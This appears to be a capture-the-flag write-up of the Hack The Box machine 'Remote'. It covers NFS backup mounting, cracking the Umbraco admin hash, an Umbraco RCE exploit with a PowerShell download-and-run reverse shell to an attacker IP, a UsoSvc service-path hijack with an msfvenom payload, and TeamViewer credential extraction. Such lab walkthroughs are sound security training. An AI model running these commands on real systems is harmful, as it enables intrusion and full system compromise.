Remote is a Windows machine rated as easy from Hack The Box, it consists on finding some credentials in order to use an Umbraco RCE exploit to obtain initial access and then exploit UsoSvc service to gain a full privilege shell. Furthermore , teamviewer 7 can be exploited to obtain administrator credentials.
Enumeration
Running nmap :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
nmap -sC -sV 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 15:57 CEST
Nmap scan report for 10.10.10.180
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Browsing to port 80 we find the following page : 
Running gobuster we find an interesting directory:
1
2
3
4
5
6
7
8
gobuster dir -u 10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/home (Status: 200)
/blog (Status: 200)
/people (Status: 200)
/products (Status: 200)
/contact (Status: 200)
/install (Status: 302)
/about-us (Status: 200)
Browsing to /install we discover it is running Umbraco service
As rpc service is open we can list mounts :
1
2
3
showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
This backup is available for everyone so we can mount it in our machine :
1
mount -t nfs 10.10.10.180:/site_backups /mnt
Then inside App_Data we find an interesting file Umbraco.sdf, running strings on it we find useful information:
1
2
strings Umbraco.sdf | head
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
There we have a user and a hashed password, we can crack it using john:
1
2
3
4
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
admin@htb.local:baconandcheese
1 password hash cracked, 0 left
Exploitation
With this set of credentials we can login to /install, and there we discover the site is running Umbraco 7.12.4 
The following RCE exploit was found: https://www.exploit-db.com/exploits/46153.
Nishang Invoke-Tcp.ps1 will be uploaded to obtain a powershell reverse shell.
First we will setup a python server
1
python -m SimpleHTTPServer 80
Then the following line will be added to the powershell script so the reverse shell triggers automatically once uploaded:
1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.26 -Port 443
Now we run the exploit :
1
python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.15.26:800/Invoke-PowerShellTcp.ps1')"
And we obtain a reverse shell in netcat :
1
2
3
4
5
6
7
nc -lvnp 443
listening on [any] 443 ...
tconnect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49759
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv> $env:UserName
REMOTE$
Privilege Escalation Method #1
To enumerate the system we will use PowerUp powershell script https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
We upload it to the machine and load to memory :
1
2
PS C:\windows\temp> invoke-webrequest -Uri http://10.10.15.26:800/PowerUp.ps1 -OutFile PowerUp.ps1
PS C:\windows\temp> . .\PowerUp.ps1
Running it we obtain an interesting ouput:
1
2
3
4
5
6
7
PS C:\windows\temp> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Users\Public\fremote.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'
We can exploit this service following this guide
First, we create a shell with msfvenom :
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.26 LPORT=4444 -f exe >shell.exe
Then we stop the service, add our shell to the path and restart it :
1
2
3
PS C:\windows\temp> sc.exe stop UsoSvc
sc.exe config UsoSvc binPath="C:\windows\temp\shell.exe"
PS C:\windows\temp> sc.exe start UsoSvc
And we obtain a shell as nt authority\system :
1
2
3
4
5
6
7
8
9
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Privilege Escalation Method #2
Enumerating the system, we find TeamViewer version 7 installed :
1
2
3
4
5
6
C:\Program Files (x86)>cd TeamViewer
C:\Program Files (x86)\TeamViewer>dir
Directory of C:\Program Files (x86)\TeamViewer
02/20/2020 03:14 AM <DIR> .
02/20/2020 03:14 AM <DIR> ..
02/27/2020 11:35 AM <DIR> Version7
This version is vulnerable to a credentials disclosure exploit : https://www.rapid7.com/db/modules/post/windows/gather/credentials/teamviewer_passwords
Using metasploit we can obtain Administrator credentials :
1
2
3
msf5 post(windows/gather/credentials/teamviewer_passwords) > exploit
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
With this, we can use evil-winrm to log in as administrator :
1
2
3
4
5
6
7
evil-winrm -u Administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator